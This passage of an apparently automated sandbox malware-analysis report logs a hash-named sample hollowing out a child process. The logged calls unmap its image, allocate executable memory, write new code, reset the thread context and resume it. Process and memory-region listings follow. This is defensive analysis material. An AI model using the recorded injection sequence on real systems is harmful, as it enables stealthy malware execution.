[49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x262000, Edx=0x0, Ecx=0x0, Eax=0x416797, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0083.072] ReadProcessMemory (in: hProcess=0x110, lpBaseAddress=0x262008, lpBuffer=0x19ee28, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19ee28*, lpNumberOfBytesRead=0x0) returned 1 [0083.085] NtUnmapViewOfSection (ProcessHandle=0x110, BaseAddress=0x400000) returned 0x0 [0083.230] VirtualAllocEx (hProcess=0x110, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0083.233] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x400000, Buffer=0x1d15a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x1d15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0083.249] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x401000, Buffer=0x1d17a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x1d17a0*, NumberOfBytesWritten=0x0) returned 0x0 [0083.267] WriteProcessMemory (in: hProcess=0x110, lpBaseAddress=0x262008, lpBuffer=0x1d1654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d1654*, lpNumberOfBytesWritten=0x0) returned 1 [0083.357] SetThreadContext (hThread=0x10c, lpContext=0x24b0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x262000, Edx=0x0, Ecx=0x0, Eax=0x402dd8, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0083.358] ResumeThread (hThread=0x10c) returned 0x1 [0083.393] CloseHandle (hObject=0x10c) returned 1 [0083.393] CloseHandle (hObject=0x110) returned 1 [0083.393] ExitProcess (uExitCode=0x0) [0083.393] HeapFree (in: hHeap=0x3fb0000, dwFlags=0x0, lpMem=0x3fb05a8 | out: hHeap=0x3fb0000) returned 1 Thread: id = 2 os_tid = 0x1368 Process: id = "2" image_name = "19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" page_root = "0x376d1000" os_pid = "0x1370" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1358" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 319 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 320 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 321 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 322 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 323 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 324 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 325 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 326 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 327 start_va = 0x400000 end_va = 0x24affff monitored = 1 entry_point = 0x416797 region_type = mapped_file name = "19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe") Region: id = 328 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 329 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 330 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 331 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 332 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 333 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 335 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 336 start_va = 0x1c0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 337 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 338 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 339 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 340 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 341 start_va = 0x410000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 342 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 343 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 344 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 345 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 346 start_va = 0x4d0000 end_va = 0x58dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 347 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 348 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 349 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 350 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 351 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 352 start_va = 0x450000 end_va = 0x479fff monitored = 0 entry_point = 0x455680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 353 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 354 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 355 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 356 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 357 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 358 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 359 start_va = 0x1c0000 end_va = 0x1c3fff monitored = 1 entry_point = 0x0 region_type = private name = 